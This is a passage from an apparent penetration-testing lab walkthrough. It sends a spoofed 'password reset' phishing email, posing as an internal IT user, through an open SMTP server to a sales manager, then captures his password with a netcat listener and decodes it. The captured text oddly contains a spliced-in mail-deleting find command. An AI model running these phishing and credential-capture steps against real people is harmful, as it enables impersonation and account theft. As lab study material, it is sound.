Phishing
The target web server discloses 4 possible users and those 4 users have been identified against the target SMTP server to be present. While user behavior cannot be predicted at this time, the target SMTP server does allow sending mail without authentication. Additional username enumeration and brute-force attack identified a valid credential of the sales user, leading to a mail sent by the it user regarding sending a “password reset links” to register sales team to the ERP system. Given the brian.moore user is a Sales Manager, it might be possible to send a phishing email to the brian.moore user with a “password reset link” as the it user.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ swaks --to brian.moore@postfish.off --from it@postfish.off --header "subject: Password Reset link" --body "http://192.168.45.192/password_reset" --server $IP --port 25
=== Trying 192.168.111.137:25...
=== Connected to 192.168.111.137.
<- 220 postfish.off ESMTP Postfix (Ubuntu)
-> EHLO kali
<- 250-postfish.off
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250-SMTPUTF8
<- 250 CHUNKING
-> MAIL FROM:<it@postfish.off>
<- 250 2.1.0 Ok
-> RCPT TO:<brian.moore@postfish.off>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Wed, 26 Mar 2025 14:18:46 +0100
-> To: brian.moore@postfish.off
-> From: it@postfish.off
-> Subject: test Wed, 26 Mar 2025 14:18:46 +0100
-> Message-Id: <20250326141846.132243@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> subject: Password Reset link
->
-> http://192.168.45.192/password_reset
->
->
-> .
<- 250 2.0.0 Ok: queued as 74621458F8
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.Phishing mail sent to the brian.moore user as the it user with a “password reset link” in the body
Credential Retrival
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ nnc 80
listening on [any] 80 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.111.137] 50342
POST /password_reset HTTP/1.1
Host: 192.168.45.192
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinEA moment later, a POST request was made to the Kali web server with what appears to be a URL-encoded string containing the credential of the brian.moore user
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ hurl -u 'first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE'
Original :: first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE
URL DEcoded :: first_name=Brian&last_name=Moore&email=brian.moore%postfish.off&username=brian.moore&password=EternaLSunshinE&confifind /var/mail/ -type f ! -name sales -delete_password=EternaLSunshinEThe password of the brian.moore user is EternaLSunshinE
Validating against the target SSH server